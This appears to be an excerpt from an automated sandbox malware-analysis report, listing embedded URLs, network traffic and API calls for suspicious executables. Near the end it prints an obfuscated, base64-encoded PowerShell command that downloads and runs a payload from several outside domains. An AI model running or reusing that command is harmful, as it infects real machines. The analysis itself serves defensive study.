            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://powerlift.acompli.net
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://retailer.osi.office.net/appstate/query
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://settings.outlook.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://shell.suite.office.com:1443
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://skyapi.live.net/Activity/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://store.office.cn/addinstemplate
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://store.office.com/addinstemplate
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://store.office.de/addinstemplate
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://tasks.office.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://templatelogging.office.com/client/log
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://web.microsoftstream.com/video/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://wus2-000.contentsync.
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://www.odwebp.svc.ms
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: C:\Users\user\849.exeCode function: 4_2_0041E3E9 GetKeyState,GetKeyState,GetKeyState,GetKeyState,4_2_0041E3E9
            Source: C:\Users\user\849.exeCode function: 4_2_00450B9A __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,4_2_00450B9A
            Source: C:\Users\user\849.exeCode function: 4_2_00424D66 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,4_2_00424D66
            Source: C:\Users\user\849.exeCode function: 4_2_0044716C ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,4_2_0044716C
            Source: C:\Users\user\849.exeCode function: 4_2_00447984 GetKeyState,GetKeyState,GetKeyState,4_2_00447984
            Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exeCode function: 5_2_0041E3E9 GetKeyState,GetKeyState,GetKeyState,GetKeyState,5_2_0041E3E9
            Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exeCode function: 5_2_00450B9A __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,5_2_00450B9A
            Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exeCode function: 5_2_00424D66 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,5_2_00424D66
            Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exeCode function: 5_2_0044716C ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,5_2_0044716C
            Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exeCode function: 5_2_00447984 GetKeyState,GetKeyState,GetKeyState,5_2_00447984

            E-Banking Fraud:

            barindex
            Malicious encrypted Powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABaAEMAUQBEAFgAeABwAGIAPQAnAFoAWABHAE0ASwBjAHgAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAGAAUgBgAGkAVAB5AHAAcgBPAFQAYABPAEMATwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQATwBJAEcARwBJAGIAdABwACAAPQAgACcAOAA0ADkAJwA7ACQAQQBZAEsAUABVAGkAbABxAD0AJwBZAEgARgBOAEsAYwBjAG8AJwA7ACQAVwBGAEIATgBTAHMAdgBzAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAEkARwBHAEkAYgB0AHAAKwAnAC4AZQB4AGUAJwA7ACQAUwBIAEUAWQBRAHAAdgB1AD0AJwBDAFgARQBKAFcAZQBkAHAAJwA7ACQARgBHAFYATQBUAGgAaQBiAD0AJgAoACcAbgBlAHcALQBvACcAKwAnAGIAagBlAGMAJwArACcAdAAnACkAIABOAGUAdAAuAFcARQBCAEMATABpAEUATgBUADsAJABOAFEAQwBLAE0AdwBhAHkAPQAnAGgAdAB0AHAAOgAvAC8AbgB3AGMAcwB2AGMAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHUAegA2AF8AcQBzADgAXwBxAHIALwAqAGgAdAB0AHAAOgAvAC8AbwBkAGUAcwBzAGEAcgBlAHMAbwB1AHIAYwBlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwAzAF8AbwBfAGIAdQB0ADkALwAqAGgAdAB0AHAAcwA6AC8ALwBvAG4AZQBmAGEAcgBtAGQAZQBzAGkAZwBuAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AdQBfAGYAaQBnAF8AbQAyAG0AdgAvACoAaAB0AHQAcAA6AC8ALwBvAG4AZQB3AGkAdABoAHkAbwB1AGMAZAAuAGMAbwBtAC8AXwBtAG0ALwBvAGkAeABfAGsAdABjAHAAYwBfAGQAbABqAGgAcwBlAHgALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBwAGkAZQBtAG8AbgB0AGUAaQB0AGkAbgBlAHIAYQAuAG4AZQB0AC8AbgBfAGcAMgBvADQAXwBqAHUAbQBrAHQANAAvACcALgAiAHMAYABwAEwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUABOAFcAVgBMAGcAaABjAD0AJwBUAEsAVgBLAEgAbwBkAHQAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAUABIAEgAWgBpAGMAcgAgAGkAbgAgACQATg